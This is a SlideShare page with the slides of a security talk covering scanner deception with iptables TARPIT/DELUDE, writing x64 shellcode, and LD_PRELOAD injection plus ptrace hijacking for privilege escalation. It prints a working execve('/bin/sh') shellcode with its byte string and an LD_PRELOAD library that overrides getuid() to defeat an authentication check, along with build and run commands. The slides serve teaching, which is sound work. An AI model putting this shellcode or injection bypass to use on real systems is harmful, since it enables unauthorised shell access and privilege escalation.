SlideShare a Scribd company logo

Code Red Security

Download as odp, pdf
A
Amr Ali

The document discusses various techniques for deception and bypassing security checks, including: 1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections. 2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI. 3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication. 4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges. 5) Mounting a local privilege escalation attack after gaining initial user access.

1 of 14

Download presentation

Your download has started
Downloaded 16 times
Code Red Security - The Art of Deception - x64 shell codes and kernel ABI - DL-Injection - Hijacking processes with ptrace() - DL-Injection attack vector (Don't try it at home) Session by Amr Ali http://amr-ali.co.cc/ [email_address]
The Art of Deception Kevin Mitnick
The Art of Deception - We are talking today about deceiving port scanners and other reconnaissance tools and/or techniques. Iptables is the main firewall used by Linux users around the world, so we are going to make great use of it with a little but very effective add-on called xtables . - TARPIT and DELUDE are the main targets xtables provides for our purposes. TARPIT captures and holds incoming TCP connections using no local per connection resources. Connections are accepted, but immediately switched to the persist state (0 byte window), in which the remote side stops sending data and asks to continue every 60-240 seconds. Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes. SYN ---------------> Server SYN/ACK <-------------------- Server ACK ----------------------> Server WIN[0] <--------------------- Server
The Art of Deception - The DELUDE target will reply to a SYN packet with SYN/ACK, and to all other packets with a RST. This will terminate the connection much like REJECT, but network scanners doing TCP half open discovery can be spoofed to make them believe the port is open rather than closed/filtered. - In lesser words, if someone is doing a SYN scan the response to his packets by a SYN/ACK packet, but will receive a RST if she sent an ACK, so the connection will be terminated much like the REJECT target. Same applies for ACK scan(s). Of course you will have to make sure first that a scan in place, otherwise you will kill legitimate connections. SYN --------------------> Server SYN/ACK <------------------- Server ACK -----------------------> Server RST <------------------------ Server
The Art of Deception # nmap -v -A --reason --version-all --script all -T4 -n 192.168.1.100 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-03 02:56 EET NSE: Loaded 59 scripts for scanning. Initiating SYN Stealth Scan at 02:59 Scanning 192.168.1.100 [1000 ports] Discovered open port 4422/tcp on 192.168.1.100 Discovered open port 6/tcp on 192.168.1.100 Discovered open port 78/tcp on 192.168.1.100 Discovered open port 1337/tcp on 192.168.1.100 Discovered open port 31337/tcp on 192.168.1.100 Discovered open port 88/tcp on 192.168.1.100 Discovered open port 123/tcp on 192.168.1.100 Discovered open port 8879/tcp on 192.168.1.100 Discovered open port 550/tcp on 192.168.1.100 Discovered open port 9200/tcp on 192.168.1.100 Discovered open port 5/tcp on 192.168.1.100 Discovered open port 404/tcp on 192.168.1.100 ........
x64 shell codes and kernel ABI - x86 shell coders are very used and familiar with x86 CPU registers, and its plain kernel ABI, which are ..... EAX : Holds the system call number. EBX : Contains the value or address of the 1 st argument to the system call. ECX : Contains the value or address of the 2 nd argument to the system call. EDX : Contains the value or address of the 3 rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register. These registers are plain and simple, however when it comes to x64 platforms the kernel ABI changes a bit differently in which that extra general purpose registers are added, and system call arguments registers are different.
x64 shell codes and kernel ABI - x64 registers and kernel ABI are as fellows … RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3 rd argument for the system call. RDI : The 1 st argument for the system call. RSI : The 2 nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4 th argument for the system call. R9 : The 5 th argument for the system call. R10 : The 6 th argument for the system call. R11 – R15 : General purpose registers. - Of course these are 64bit register instead of their counter part 32bit registers.
x64 shell codes and kernel ABI - Lets write a little x64 shell code, shall we? [CODE] .global _start _start: xorq %rdx, %rdx push %rdx movq $0x68732f6e69622f2f, %rbx # //bin/bash push %rbx push %rsp pop %rdi push %rdx push %rdi push %rsp pop %rsi push $0x3b pop %rax syscall arg1: .string “//bin/sh” [/CODE]
x64 shell codes and kernel ABI - So after getting the opcodes for the shell code we've written we now can put it in a string as in the form of … \x48\x31\xd2\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x6a\x3b\x58\x0f\x05 - Now we should compile and run our assembly code to make sure its running... [email_address] (/tmp):$ as test.s -o test.o [email_address] (/tmp):$ ld -s test.o -o test [email_address] (/tmp):$ ./test # Now we have confirmed it is running, its only a matter of writing an exploit and the above shell code in a string to exploit whatever vulnerable piece of code you are targeting.
DL-Injection - DL-Injection is done by injecting a dynamic library in a compiled application to override certain functionalities called from other shared libraries. The technique used can be as simple as setting an environment v a riable ( LD_PRELOAD ) and as complex as overwriting certain application PLT ( Procedure Linkage Table ) entries. - This kind of attack can be very useful in applications that does internal authentication and does not ensure the integrity of the information the system provides. For example … [CODE] .... If (getuid() == 0) { // do stuff authenticated stuff here. } ....
DL-Injection - The previous code gets the UID of the user and executes certain codes based on that. However it does not make sure that this information is true in the sense that it is not spoofed. - Now we can easily bypass this security check by simply injecting a library into this application space with a function that overrides getuid() that always returns zero. [CODE] Int getuid() { return 0; } [/CODE] [email_address] (/tmp):$ gcc -shared -fPIC inj.c -o inj.so [email_address] (/tmp):$ LD_PRELOAD=/tmp/inj.so ./vuln_app - Now we successfully bypassed that application security, by spoofing getuid() to always return zero.
Hijacking Processes – ptrace() - ptrace() is a function used to debug applications by setting breakpoints or monitor the process' registers and memory with the right permissions. We'll see in a few lines a demonstration on how to hijack a process and inject a shell code into its execution flow through overwriting its IP ( Instruction Pointer ). - We'll demonstrate this on a 32bit platform and a 64bit platform to understand further the difference between each platform assembly and kernel ABI. LIVE DEMONSTRATION
DL-Injection Attack Vector - We'll now try to mount a local privilege escalation attack on a system, assuming that we already got normal user access.
Thanks Thanks All my presentation(s) files will be on my website. If you have any questions or comments please do not hesitate to visit my website or contact me via email http://amr-ali.co.cc [email_address] For job offers, please visit … http://amr-ali.co.cc/resume

Recommended

Socket programing
Socket programingSocket programing
Socket programing
Pankil Agrawal
 
Socket Programming
Socket ProgrammingSocket Programming
Socket Programming
Mostak Ahmed
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacks
Cyber Security Alliance
 
Socket Programming it-slideshares.blogspot.com
Socket Programming it-slideshares.blogspot.comSocket Programming it-slideshares.blogspot.com
Socket Programming it-slideshares.blogspot.com
phanleson
 
Networking lab
Networking labNetworking lab
Networking lab
Ragu Ram
 
Socket programming
Socket programming Socket programming
Socket programming
Rajivarnan (Rajiv)
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
Cyber Security Alliance
 
Socket programming in c
Socket programming in cSocket programming in c
Socket programming in c
Md. Golam Hossain
 
Socket programming in C
Socket programming in CSocket programming in C
Socket programming in C
Deepak Swain
 
Lab manual cn-2012-13
Lab manual cn-2012-13Lab manual cn-2012-13
Lab manual cn-2012-13
Sasi Kala
 
Sockets
SocketsSockets
Sockets
Rajesh Kumar
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
sonjeku1
 
Linuxserver harden
Linuxserver hardenLinuxserver harden
Linuxserver harden
Gregory Hanis
 
Network configuration
Network configurationNetwork configuration
Network configuration
engshemachi
 
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificatesDevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon
 
Socket programming
Socket programmingSocket programming
Socket programming
Anurag Tomar
 
Networks lab manual ecp62
Networks lab manual ecp62Networks lab manual ecp62
Networks lab manual ecp62
Basil John
 
Programming TCP/IP with Sockets
Programming TCP/IP with SocketsProgramming TCP/IP with Sockets
Programming TCP/IP with Sockets
elliando dias
 
Socket Programming Tutorial
Socket Programming TutorialSocket Programming Tutorial
Socket Programming Tutorial
Jignesh Patel
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
Sayed Ahmed
 
Module 3 Scanning
Module 3 ScanningModule 3 Scanning
Module 3 Scanning
leminhvuong
 
Basics of sockets
Basics of socketsBasics of sockets
Basics of sockets
AviNash ChaVhan
 
Socket Programming
Socket ProgrammingSocket Programming
Socket Programming
VisualBee.com
 
Npc08
Npc08Npc08
Npc08
vamsitricks
 
Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programming
elliando dias
 
Basic socket programming
Basic socket programmingBasic socket programming
Basic socket programming
Kristian Arjianto
 
Sockets
SocketsSockets
Sockets
Indrasena Reddy
 
Socket programming using C
Socket programming using CSocket programming using C
Socket programming using C
Ajit Nayak
 
Advanced RAC troubleshooting: Network
Advanced RAC troubleshooting: NetworkAdvanced RAC troubleshooting: Network
Advanced RAC troubleshooting: Network
Riyaj Shamsudeen
 
Please help with the below 3 questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdfPlease help with the below 3 questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdf
support58
 

More Related Content

What's hot (20)

Socket programming in C
Socket programming in CSocket programming in C
Socket programming in C
Deepak Swain
 
Lab manual cn-2012-13
Lab manual cn-2012-13Lab manual cn-2012-13
Lab manual cn-2012-13
Sasi Kala
 
Sockets
SocketsSockets
Sockets
Rajesh Kumar
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
sonjeku1
 
Linuxserver harden
Linuxserver hardenLinuxserver harden
Linuxserver harden
Gregory Hanis
 
Network configuration
Network configurationNetwork configuration
Network configuration
engshemachi
 
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificatesDevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon
 
Socket programming
Socket programmingSocket programming
Socket programming
Anurag Tomar
 
Networks lab manual ecp62
Networks lab manual ecp62Networks lab manual ecp62
Networks lab manual ecp62
Basil John
 
Programming TCP/IP with Sockets
Programming TCP/IP with SocketsProgramming TCP/IP with Sockets
Programming TCP/IP with Sockets
elliando dias
 
Socket Programming Tutorial
Socket Programming TutorialSocket Programming Tutorial
Socket Programming Tutorial
Jignesh Patel
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
Sayed Ahmed
 
Module 3 Scanning
Module 3 ScanningModule 3 Scanning
Module 3 Scanning
leminhvuong
 
Basics of sockets
Basics of socketsBasics of sockets
Basics of sockets
AviNash ChaVhan
 
Socket Programming
Socket ProgrammingSocket Programming
Socket Programming
VisualBee.com
 
Npc08
Npc08Npc08
Npc08
vamsitricks
 
Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programming
elliando dias
 
Basic socket programming
Basic socket programmingBasic socket programming
Basic socket programming
Kristian Arjianto
 
Sockets
SocketsSockets
Sockets
Indrasena Reddy
 
Socket programming using C
Socket programming using CSocket programming using C
Socket programming using C
Ajit Nayak
 
Socket programming in C
Socket programming in CSocket programming in C
Socket programming in C
Deepak Swain
 
Lab manual cn-2012-13
Lab manual cn-2012-13Lab manual cn-2012-13
Lab manual cn-2012-13
Sasi Kala
 
Sockets
SocketsSockets
Sockets
Rajesh Kumar
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
sonjeku1
 
Linuxserver harden
Linuxserver hardenLinuxserver harden
Linuxserver harden
Gregory Hanis
 
Network configuration
Network configurationNetwork configuration
Network configuration
engshemachi
 
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificatesDevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon
 
Socket programming
Socket programmingSocket programming
Socket programming
Anurag Tomar
 
Networks lab manual ecp62
Networks lab manual ecp62Networks lab manual ecp62
Networks lab manual ecp62
Basil John
 
Programming TCP/IP with Sockets
Programming TCP/IP with SocketsProgramming TCP/IP with Sockets
Programming TCP/IP with Sockets
elliando dias
 
Socket Programming Tutorial
Socket Programming TutorialSocket Programming Tutorial
Socket Programming Tutorial
Jignesh Patel
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
Sayed Ahmed
 
Module 3 Scanning
Module 3 ScanningModule 3 Scanning
Module 3 Scanning
leminhvuong
 
Basics of sockets
Basics of socketsBasics of sockets
Basics of sockets
AviNash ChaVhan
 
Socket Programming
Socket ProgrammingSocket Programming
Socket Programming
VisualBee.com
 
Npc08
Npc08Npc08
Npc08
vamsitricks
 
Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programming
elliando dias
 
Basic socket programming
Basic socket programmingBasic socket programming
Basic socket programming
Kristian Arjianto
 
Sockets
SocketsSockets
Sockets
Indrasena Reddy
 
Socket programming using C
Socket programming using CSocket programming using C
Socket programming using C
Ajit Nayak
 

Similar to Code Red Security (20)

Advanced RAC troubleshooting: Network
Advanced RAC troubleshooting: NetworkAdvanced RAC troubleshooting: Network
Advanced RAC troubleshooting: Network
Riyaj Shamsudeen
 
Please help with the below 3 questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdfPlease help with the below 3 questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdf
support58
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buenaño
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commands
tmavroidis
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
6005679.ppt
6005679.ppt6005679.ppt
6005679.ppt
AlmaOraevi
 
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docxAll contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
galerussel59292
 
1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618) 1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618)
Mohmed Abou Elenein Attia
 
managing your network environment
managing your network environmentmanaging your network environment
managing your network environment
scooby_doo
 
In depth understanding network security
In depth understanding network securityIn depth understanding network security
In depth understanding network security
Thanawan Tuamyim
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
arnaudsoullie
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Cisco data center support
Cisco data center supportCisco data center support
Cisco data center support
Krunal Shah
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
Aman Gupta
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
ironSource
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait
 
Troubleshooting basic networks
Troubleshooting basic networksTroubleshooting basic networks
Troubleshooting basic networks
Arnold Derrick Kinney
 
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docxINFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
carliotwaycave
 
Advanced RAC troubleshooting: Network
Advanced RAC troubleshooting: NetworkAdvanced RAC troubleshooting: Network
Advanced RAC troubleshooting: Network
Riyaj Shamsudeen
 
Please help with the below 3 questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdfPlease help with the below 3 questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdf
support58
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buenaño
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commands
tmavroidis
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
6005679.ppt
6005679.ppt6005679.ppt
6005679.ppt
AlmaOraevi
 
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docxAll contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
All contents are Copyright © 1992–2012 Cisco Systems, Inc. A.docx
galerussel59292
 
1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618) 1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618)
Mohmed Abou Elenein Attia
 
managing your network environment
managing your network environmentmanaging your network environment
managing your network environment
scooby_doo
 
In depth understanding network security
In depth understanding network securityIn depth understanding network security
In depth understanding network security
Thanawan Tuamyim
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
arnaudsoullie
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Cisco data center support
Cisco data center supportCisco data center support
Cisco data center support
Krunal Shah
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
Aman Gupta
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
ironSource
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait
 
Troubleshooting basic networks
Troubleshooting basic networksTroubleshooting basic networks
Troubleshooting basic networks
Arnold Derrick Kinney
 
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docxINFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
INFA 620Laboratory 4 Configuring a FirewallIn this exercise.docx
carliotwaycave
 

Recently uploaded (20)

MCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCP
MCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCPMCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCP
MCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCP
Sambhav Kothari
 
What is DePIN? The Hottest Trend in Web3 Right Now!
What is DePIN? The Hottest Trend in Web3 Right Now!What is DePIN? The Hottest Trend in Web3 Right Now!
What is DePIN? The Hottest Trend in Web3 Right Now!
cryptouniversityoffi
 
Contributing to WordPress With & Without Code.pptx
Contributing to WordPress With & Without Code.pptxContributing to WordPress With & Without Code.pptx
Contributing to WordPress With & Without Code.pptx
Patrick Lumumba
 
Introducing the OSA 3200 SP and OSA 3250 ePRC
Introducing the OSA 3200 SP and OSA 3250 ePRCIntroducing the OSA 3200 SP and OSA 3250 ePRC
Introducing the OSA 3200 SP and OSA 3250 ePRC
Adtran
 
Fully Open-Source Private Clouds: Freedom, Security, and Control
Fully Open-Source Private Clouds: Freedom, Security, and ControlFully Open-Source Private Clouds: Freedom, Security, and Control
Fully Open-Source Private Clouds: Freedom, Security, and Control
ShapeBlue
 
A Comprehensive Guide on Integrating Monoova Payment Gateway
A Comprehensive Guide on Integrating Monoova Payment GatewayA Comprehensive Guide on Integrating Monoova Payment Gateway
A Comprehensive Guide on Integrating Monoova Payment Gateway
danielle hunter
 
Agentic AI - The New Era of Intelligence
Agentic AI - The New Era of IntelligenceAgentic AI - The New Era of Intelligence
Agentic AI - The New Era of Intelligence
Muzammil Shah
 
UiPath Community Zurich: Release Management and Build Pipelines
UiPath Community Zurich: Release Management and Build PipelinesUiPath Community Zurich: Release Management and Build Pipelines
UiPath Community Zurich: Release Management and Build Pipelines
UiPathCommunity
 
SAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AI
SAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AISAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AI
SAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AI
Peter Spielvogel
 
STKI Israel Market Study 2025 final v1 version
STKI Israel Market Study 2025 final v1 versionSTKI Israel Market Study 2025 final v1 version
STKI Israel Market Study 2025 final v1 version
Dr. Jimmy Schwarzkopf
 
System Card: Claude Opus 4 & Claude Sonnet 4
System Card: Claude Opus 4 & Claude Sonnet 4System Card: Claude Opus 4 & Claude Sonnet 4
System Card: Claude Opus 4 & Claude Sonnet 4
Razin Mustafiz
 
Droidal: AI Agents Revolutionizing Healthcare
Droidal: AI Agents Revolutionizing HealthcareDroidal: AI Agents Revolutionizing Healthcare
Droidal: AI Agents Revolutionizing Healthcare
Droidal LLC
 
GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...
GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...
GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...
James Anderson
 
Offshore IT Support: Balancing In-House and Offshore Help Desk Technicians
Offshore IT Support: Balancing In-House and Offshore Help Desk TechniciansOffshore IT Support: Balancing In-House and Offshore Help Desk Technicians
Offshore IT Support: Balancing In-House and Offshore Help Desk Technicians
john823664
 
Cyber Security Legal Framework in Nepal.pptx
Cyber Security Legal Framework in Nepal.pptxCyber Security Legal Framework in Nepal.pptx
Cyber Security Legal Framework in Nepal.pptx
Ghimire B.R.
 
Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025
Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025
Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025
Nikki Chapple
 
Building Agents with LangGraph & Gemini
Building Agents with LangGraph & GeminiBuilding Agents with LangGraph & Gemini
Building Agents with LangGraph & Gemini
HusseinMalikMammadli
 
Let’s Get Slack Certified! 🚀- Slack Community
Let’s Get Slack Certified! 🚀- Slack CommunityLet’s Get Slack Certified! 🚀- Slack Community
Let’s Get Slack Certified! 🚀- Slack Community
SanjeetMishra29
 
cloudgenesis cloud workshop , gdg on campus mita
cloudgenesis cloud workshop , gdg on campus mitacloudgenesis cloud workshop , gdg on campus mita
cloudgenesis cloud workshop , gdg on campus mita
siyaldhande02
 
Content and eLearning Standards: Finding the Best Fit for Your-Training
Content and eLearning Standards: Finding the Best Fit for Your-TrainingContent and eLearning Standards: Finding the Best Fit for Your-Training
Content and eLearning Standards: Finding the Best Fit for Your-Training
Rustici Software
 
MCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCP
MCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCPMCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCP
MCP Dev Summit - Pragmatic Scaling of Enterprise GenAI with MCP
Sambhav Kothari
 
What is DePIN? The Hottest Trend in Web3 Right Now!
What is DePIN? The Hottest Trend in Web3 Right Now!What is DePIN? The Hottest Trend in Web3 Right Now!
What is DePIN? The Hottest Trend in Web3 Right Now!
cryptouniversityoffi
 
Contributing to WordPress With & Without Code.pptx
Contributing to WordPress With & Without Code.pptxContributing to WordPress With & Without Code.pptx
Contributing to WordPress With & Without Code.pptx
Patrick Lumumba
 
Introducing the OSA 3200 SP and OSA 3250 ePRC
Introducing the OSA 3200 SP and OSA 3250 ePRCIntroducing the OSA 3200 SP and OSA 3250 ePRC
Introducing the OSA 3200 SP and OSA 3250 ePRC
Adtran
 
Fully Open-Source Private Clouds: Freedom, Security, and Control
Fully Open-Source Private Clouds: Freedom, Security, and ControlFully Open-Source Private Clouds: Freedom, Security, and Control
Fully Open-Source Private Clouds: Freedom, Security, and Control
ShapeBlue
 
A Comprehensive Guide on Integrating Monoova Payment Gateway
A Comprehensive Guide on Integrating Monoova Payment GatewayA Comprehensive Guide on Integrating Monoova Payment Gateway
A Comprehensive Guide on Integrating Monoova Payment Gateway
danielle hunter
 
Agentic AI - The New Era of Intelligence
Agentic AI - The New Era of IntelligenceAgentic AI - The New Era of Intelligence
Agentic AI - The New Era of Intelligence
Muzammil Shah
 
UiPath Community Zurich: Release Management and Build Pipelines
UiPath Community Zurich: Release Management and Build PipelinesUiPath Community Zurich: Release Management and Build Pipelines
UiPath Community Zurich: Release Management and Build Pipelines
UiPathCommunity
 
SAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AI
SAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AISAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AI
SAP Sapphire 2025 ERP1612 Enhancing User Experience with SAP Fiori and AI
Peter Spielvogel
 
STKI Israel Market Study 2025 final v1 version
STKI Israel Market Study 2025 final v1 versionSTKI Israel Market Study 2025 final v1 version
STKI Israel Market Study 2025 final v1 version
Dr. Jimmy Schwarzkopf
 
System Card: Claude Opus 4 & Claude Sonnet 4
System Card: Claude Opus 4 & Claude Sonnet 4System Card: Claude Opus 4 & Claude Sonnet 4
System Card: Claude Opus 4 & Claude Sonnet 4
Razin Mustafiz
 
Droidal: AI Agents Revolutionizing Healthcare
Droidal: AI Agents Revolutionizing HealthcareDroidal: AI Agents Revolutionizing Healthcare
Droidal: AI Agents Revolutionizing Healthcare
Droidal LLC
 
GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...
GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...
GDG Cloud Southlake #43: Tommy Todd: The Quantum Apocalypse: A Looming Threat...
James Anderson
 
Offshore IT Support: Balancing In-House and Offshore Help Desk Technicians
Offshore IT Support: Balancing In-House and Offshore Help Desk TechniciansOffshore IT Support: Balancing In-House and Offshore Help Desk Technicians
Offshore IT Support: Balancing In-House and Offshore Help Desk Technicians
john823664
 
Cyber Security Legal Framework in Nepal.pptx
Cyber Security Legal Framework in Nepal.pptxCyber Security Legal Framework in Nepal.pptx
Cyber Security Legal Framework in Nepal.pptx
Ghimire B.R.
 
Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025
Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025
Protecting Your Sensitive Data with Microsoft Purview - IRMS 2025
Nikki Chapple
 
Building Agents with LangGraph & Gemini
Building Agents with LangGraph & GeminiBuilding Agents with LangGraph & Gemini
Building Agents with LangGraph & Gemini
HusseinMalikMammadli
 
Let’s Get Slack Certified! 🚀- Slack Community
Let’s Get Slack Certified! 🚀- Slack CommunityLet’s Get Slack Certified! 🚀- Slack Community
Let’s Get Slack Certified! 🚀- Slack Community
SanjeetMishra29
 
cloudgenesis cloud workshop , gdg on campus mita
cloudgenesis cloud workshop , gdg on campus mitacloudgenesis cloud workshop , gdg on campus mita
cloudgenesis cloud workshop , gdg on campus mita
siyaldhande02
 
Content and eLearning Standards: Finding the Best Fit for Your-Training
Content and eLearning Standards: Finding the Best Fit for Your-TrainingContent and eLearning Standards: Finding the Best Fit for Your-Training
Content and eLearning Standards: Finding the Best Fit for Your-Training
Rustici Software
 

Code Red Security

